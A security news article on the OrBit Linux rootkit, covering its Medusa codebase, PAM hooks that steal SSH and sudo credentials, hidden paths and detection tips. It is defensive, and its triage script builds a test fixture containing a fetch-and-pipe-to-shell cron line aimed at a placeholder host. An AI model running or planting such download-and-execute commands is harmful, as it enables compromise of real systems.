OrBit Rootkit Still Steals Linux SSH and Sudo Credentials in 2026
OrBit, a stealthy Linux rootkit first documented in 2022, is still active in 2026 and continues to help attackers steal SSH and sudo credentials from compromised systems.
New research from Intezer shows that OrBit is not just a one-off custom malware family. The rootkit is tied to the Medusa open-source LD_PRELOAD rootkit codebase, which attackers have reused, reconfigured, and redeployed across several years.
The latest findings matter because OrBit does not behave like simple credential-stealing malware. It embeds itself into the Linux authentication and process environment, hides its own files and network activity, and gives attackers a quiet backdoor into infected machines.
What OrBit does on Linux systems
OrBit runs as a shared object file on Linux. Once installed, it abuses the dynamic linker so its malicious library is loaded into processes across the system. This lets the rootkit monitor activity system-wide and interfere with what users and security tools can see.
Intezer’s original 2022 analysis described OrBit as a Linux userland rootkit with persistence, SSH backdoor access, credential theft, TTY logging, and extensive function hooking. The newer 2026 research shows the malware has continued to evolve instead of disappearing.
OrBit can hook more than 40 libc functions to hide files, processes, and network connections. It also hooks Pluggable Authentication Module (PAM) functions, which lets it capture credentials during SSH and sudo authentication attempts.
| OrBit capability | What it means for defenders |
|---|---|
| SSH and sudo credential theft | Attackers can collect valid usernames and passwords from infected systems. |
| Dynamic linker abuse | The malicious library can load into processes across the system. |
| File and process hiding | Standard Linux commands may not show the malware or its artifacts. |
| SSH backdoor access | Attackers can reconnect without noisy command-and-control traffic. |
| PAM manipulation | Newer builds can interfere with authentication results, not just collect passwords. |
OrBit and Medusa share the same rootkit codebase
Intezer’s 2026 analysis links OrBit to Medusa, an open-source LD_PRELOAD rootkit published on GitHub in December 2022. Researchers compared OrBit samples with Medusa builds and found matching source-file fingerprints, hook structures, and obfuscation patterns.
This changes the way defenders should look at the malware. The threat is not only one attacker’s private tool. It is a reusable codebase that different operators can compile with new credentials, paths, encryption keys, and deployment methods.
That flexibility makes detection harder. A defender may see a different username, password, hidden folder, or XOR key, but the underlying rootkit structure can remain the same.
How OrBit changed between 2022 and 2026
Intezer tracked more than a dozen OrBit samples from 2022 through early 2026. The samples split into two main build paths: a full-featured Lineage A version and a lighter Lineage B version.
Lineage A carried the broader attack toolkit, including credential capture, hiding features, and network-related functions. Lineage B dropped several capabilities to reduce its footprint. According to Intezer, Lineage B has not surfaced since 2024, which suggests operators may have moved back toward the fuller build.
The most important capability change appeared in 2025. A newer OrBit build added a hook for pam_sm_authenticate, a server-side PAM authentication function. That means the rootkit can move beyond passive credential collection and interfere with authentication outcomes.
- 2022 samples used the original OrBit-style full build.
- Later 2022 samples shifted to the libseconf working directory.
- 2023 samples introduced a lighter Lineage B build.
- 2024 samples showed more diversity, including a 0xAA XOR key rotation.
- 2025 samples added stronger authentication manipulation through pam_sm_authenticate.
- 2026 samples still showed Lineage A activity with the libseconf working directory.
Attackers use OrBit for stealth and persistence
OrBit’s main strength is stealth. It can store credentials and configuration files in hidden locations, then stop normal system tools from showing those files.
Earlier OrBit activity used paths such as /lib/libntpVnQE6mk/. Later variants commonly used /lib/libseconf/. Other observed paths include /lib/locate/, which appeared in activity linked by researchers to the UNC3886 cluster through Mandiant’s MEDUSA reporting.
The malware can also keep network activity hidden. This matters because attackers do not always need to call out to a command server. In many cases, they can connect back through the SSH backdoor when they want access.
Multiple threat groups have used the same codebase
Intezer says the presence of OrBit across several years does not point to one single operator. Instead, the research identifies at least three separate operator clusters using the same or related codebase.
Mandiant previously reported that UNC3886, a suspected China-nexus espionage actor, used MEDUSA and its SEAELF installer during operations involving VMware and other infrastructure. Intezer says Mandiant’s MEDUSA details match its 2024 OrBit Lineage A cluster across several fields, including the 0xAA key, backdoor credentials, install path, and strace redirection artifact.
CrowdStrike’s 2026 Global Threat Report also notes that BLOCKADE SPIDER used the OrBit backdoor to maintain stealthy access in virtualization environments. Intezer also observed a 2025 dropper chain with similarities to RHOMBUS-linked infrastructure, although it cautioned that this connection should not drive attribution by itself.
| Threat activity | Connection to OrBit or Medusa |
|---|---|
| UNC3886 | Mandiant reported MEDUSA use in espionage operations involving virtualized environments. |
| BLOCKADE SPIDER | CrowdStrike linked the actor to OrBit use for stealthy persistence in virtualization environments. |
| RHOMBUS-linked infrastructure | Intezer observed a 2025 two-stage chain with shared architecture and domain overlap. |
Why Linux defenders should care
Linux servers often host cloud workloads, internal services, databases, build systems, and virtualization infrastructure. A rootkit that steals SSH and sudo credentials can help attackers move deeper into an environment while using legitimate access paths.
This makes OrBit especially dangerous in enterprise networks. Once attackers collect valid credentials, they may not need noisy exploitation attempts. They can log in, move laterally, and maintain access while appearing more like a real administrator.
The rootkit also shows why defenders should not rely only on standard Linux command-line checks after a suspected compromise. If OrBit has hooked core functions, commands such as ls, ps, netstat, or similar tools may not show the full truth.
Detection tips and indicators to watch
Intezer recommends looking for recurring artifacts that appear across OrBit and Medusa builds, even when operators change credentials or installation paths.
Useful signs include unexpected files such as sshpass.txt, sshpass2.txt, .logpam, .ports, and hidden directories such as /lib/libseconf/. Defenders should also investigate suspicious use of /etc/ld.so.preload, unexpected dynamic linker changes, and unusual cron jobs that fetch remote shell scripts.
Security teams should combine file-system checks with memory analysis, EDR telemetry, YARA rules, and offline forensic review. A trusted live response environment can help avoid results filtered by the rootkit itself.
- Check /etc/ld.so.preload for unexpected entries.
- Look for hidden folders under /lib and /usr/lib.
- Hunt for sshpass.txt, sshpass2.txt, .logpam, .ports, and .pts artifacts.
- Review cron.hourly entries for suspicious download commands.
- Compare process, network, and file listings from trusted offline tools.
- Rotate SSH and sudo credentials after confirming compromise.
- Rebuild affected systems when rootkit-level compromise is confirmed.
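The checklist above can be scripted as a first-pass triage. The following POSIX shell helper is an added example, not code from Intezer or the article: it walks a filesystem prefix for the artifacts named above, so it can be pointed at an offline-mounted image (e.g. /mnt/evidence) or run from a trusted live-response environment, since on a live host the rootkit's libc hooks can hide exactly the files it looks for. The directory and file names are the article's; the fixture, the `libplaceholder.so` name, and the cron script contents are constructed.

```shell
# orbit_triage [ROOT]: report OrBit/Medusa artifacts below ROOT ("" = live root).
# Sets ORBIT_FINDINGS to the number of hits so callers can act on the result.
orbit_triage() {
    root="${1%/}"          # prefix to scan, trailing slash stripped
    ORBIT_FINDINGS=0       # global counter the caller can read afterwards
    note() { echo "[orbit] $1"; ORBIT_FINDINGS=$((ORBIT_FINDINGS + 1)); }
    # 1. /etc/ld.so.preload is normally absent; every entry deserves review.
    if [ -s "$root/etc/ld.so.preload" ]; then
        while IFS= read -r lib || [ -n "$lib" ]; do
            if [ -n "$lib" ]; then note "ld.so.preload loads: $lib"; fi
        done < "$root/etc/ld.so.preload"
    fi
    # 2. Known working directories plus any dot-directory under /lib and /usr/lib.
    for base in "$root/lib" "$root/usr/lib"; do
        for d in "$base/libseconf" "$base/libntpVnQE6mk" "$base/locate" "$base"/.[!.]*; do
            if [ -d "$d" ]; then note "suspicious directory: $d"; fi
        done
    done
    # 3. Credential and TTY-log artifacts anywhere below the prefix (same filesystem).
    for name in sshpass.txt sshpass2.txt .logpam .ports .pts; do
        paths=$(find "$root/" -xdev -name "$name" 2>/dev/null) || true
        if [ -n "$paths" ]; then note "artifact $name at: $(echo "$paths" | tr '\n' ' ')"; fi
    done
    # 4. cron.hourly jobs that download remote content (the dropper pattern above).
    for f in "$root"/etc/cron.hourly/*; do
        if [ -f "$f" ] && grep -Eq '(^|[[:space:];|&])(curl|wget)[[:space:]].*://' "$f"; then
            note "cron.hourly job fetches remote content: $f"
        fi
    done
    echo "[orbit] $ORBIT_FINDINGS finding(s) under '${root:-/}'"
    return 0
}

# Constructed fixture for the demo: a fake root laid out like an OrBit host.
# Names come from the article; libplaceholder.so and the file contents are made up.
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/etc/cron.hourly" "$fx/lib/libseconf" "$fx/usr/lib"
    echo "/lib/libseconf/libplaceholder.so" > "$fx/etc/ld.so.preload"
    : > "$fx/lib/libseconf/sshpass.txt"
    : > "$fx/lib/libseconf/.logpam"
    printf '#!/bin/sh\ncurl -s http://example.invalid/u.sh | sh\n' > "$fx/etc/cron.hourly/0update"
    echo "$fx"
}

demo=$(make_fixture)
orbit_triage "$demo"
rm -rf "$demo"
```

Against a real image, invoke `orbit_triage /mnt/evidence`; any non-zero ORBIT_FINDINGS should trigger the memory, EDR, and offline forensic follow-up described above rather than an in-place cleanup.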
What admins should do now
Organizations running Linux servers should treat OrBit as a persistence and credential theft threat, not just a malware cleanup issue. Removing the files may not fix the broader problem if attackers already collected valid credentials.
Admins should review privileged account use, rotate exposed credentials, check SSH keys, audit sudo activity, and inspect systems that share credentials with the infected host. They should also review virtualization servers and cloud-hosted Linux systems, where stealthy access can create wider impact.
The broader lesson is clear. Public rootkit code can become a long-running enterprise threat when attackers adapt it across campaigns. OrBit’s continued activity shows that older Linux malware families can remain dangerous when operators keep changing deployment details.
FAQ
OrBit is a Linux userland rootkit that can hide files, processes, and network activity while stealing SSH and sudo credentials from compromised systems. It can also provide attackers with SSH backdoor access.
Yes. Intezer tracked OrBit samples from 2022 through early 2026, showing that the malware family and related Medusa codebase remain active across multiple deployments.
OrBit hooks PAM authentication functions used by SSH and sudo. This lets it capture usernames and passwords during login attempts and store them in hidden files on the infected system.
OrBit hooks core Linux functions so standard tools may not show its files, processes, or network connections. This means defenders may need offline forensic tools, memory analysis, EDR telemetry, and YARA rules to detect it reliably.
Admins should isolate the host, preserve forensic evidence, rotate SSH and sudo credentials, audit privileged access, inspect related systems, and consider rebuilding the affected machine from a trusted source. Rootkit infections should be treated as serious system compromises.